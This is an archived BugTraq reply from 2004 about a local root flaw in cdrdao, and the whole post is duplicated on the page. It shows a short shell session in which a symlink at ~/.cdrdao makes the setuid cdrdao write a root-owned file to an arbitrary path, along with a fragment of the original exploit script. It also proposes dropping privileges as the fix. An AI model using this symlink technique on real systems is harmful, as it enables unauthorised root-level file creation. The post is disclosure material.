BugTraq
Back to list
|
Post reply
Re: cdrdao local root exploit
Oct 01 2004 07:05PM
newbug Tseng (newbug chroot org)
In-Reply-To: <1157225765.20040907131857 (at) SECURITY.NNOV (dot) RU [email concealed]>
The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2).
I think cdrdao should drop root permission before save the config.
[newbug@localhost tmp]$ ls -al /blah
ls: /blah: No such file or directory
[newbug@localhost tmp]$ ln -s /blah .cdrdao
[newbug@localhost tmp]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-5mdk
[newbug@localhost tmp]$ cdrdao blank --save
.
.
.
[newbug@localhost tmp]$ ls -al /blah
-rw-rw-r-- 1 root cdwriter 32 10月 2 10:41 /blah
[newbug@localhost tmp]$
newbug Tseng
>Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000
>Received: from mail2.securityfocus.com (205.206.231.1)
> by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000
>Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000
>Delivered-To: archive-bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
> by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing2.securityfocus.com (Postfix) with QMQP
> id 4864914374E; Tue, 7 Sep 2004 09:06:54 -0600 (MDT)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000
>Date: Tue, 7 Sep 2004 13:18:57 +0400
>From: 3APA3A <3APA3A (at) SECURITY.NNOV (dot) RU [email concealed]>
>Reply-To: 3APA3A <3APA3A (at) SECURITY.NNOV (dot) RU [email concealed]>
>Organization: http://www.security.nnov.ru
>X-Priority: 3 (Normal)
>Message-ID: <1157225765.20040907131857 (at) SECURITY.NNOV (dot) RU [email concealed]>
>To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias (at) caramail (dot) com [email concealed]>
>Cc: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Re: cdrdao local root exploit
>In-Reply-To: <20040905191642.18379.qmail (at) www.securityfocus (dot) com [email concealed]>
>References: <20040905191642.18379.qmail (at) www.securityfocus (dot) com [email concealed]>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=Windows-1251
>Content-Transfer-Encoding: 8bit
>
>Dear Jérôme ATHIAS,
>
>This bug was originally reported to Bugtraq by Andreas Mueller on
>January, 15 2002
>
>--Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq (at) securityfocus (dot) com [email concealed]:
>
>JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao"
>
>
>
>--
>~/ZARAZA
>Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü. (Òâåí)
>
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2).
I think cdrdao should drop root permission before save the config.
[newbug@localhost tmp]$ ls -al /blah
ls: /blah: No such file or directory
[newbug@localhost tmp]$ ln -s /blah .cdrdao
[newbug@localhost tmp]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-5mdk
[newbug@localhost tmp]$ cdrdao blank --save
.
.
.
[newbug@localhost tmp]$ ls -al /blah
-rw-rw-r-- 1 root cdwriter 32 10月 2 10:41 /blah
[newbug@localhost tmp]$
newbug Tseng
>Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000
>Received: from mail2.securityfocus.com (205.206.231.1)
> by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000
>Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000
>Delivered-To: archive-bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
> by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
> by outgoing2.securityfocus.com (Postfix) with QMQP
> id 4864914374E; Tue, 7 Sep 2004 09:06:54 -0600 (MDT)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000
>Date: Tue, 7 Sep 2004 13:18:57 +0400
>From: 3APA3A <3APA3A (at) SECURITY.NNOV (dot) RU [email concealed]>
>Reply-To: 3APA3A <3APA3A (at) SECURITY.NNOV (dot) RU [email concealed]>
>Organization: http://www.security.nnov.ru
>X-Priority: 3 (Normal)
>Message-ID: <1157225765.20040907131857 (at) SECURITY.NNOV (dot) RU [email concealed]>
>To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias (at) caramail (dot) com [email concealed]>
>Cc: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Re: cdrdao local root exploit
>In-Reply-To: <20040905191642.18379.qmail (at) www.securityfocus (dot) com [email concealed]>
>References: <20040905191642.18379.qmail (at) www.securityfocus (dot) com [email concealed]>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=Windows-1251
>Content-Transfer-Encoding: 8bit
>
>Dear Jérôme ATHIAS,
>
>This bug was originally reported to Bugtraq by Andreas Mueller on
>January, 15 2002
>
>--Sunday, September 5, 2004, 11:16:42 PM, you wrote to bugtraq (at) securityfocus (dot) com [email concealed]:
>
>JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao"
>
>
>
>--
>~/ZARAZA
>Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü. (Òâåí)
>
>
[ reply ]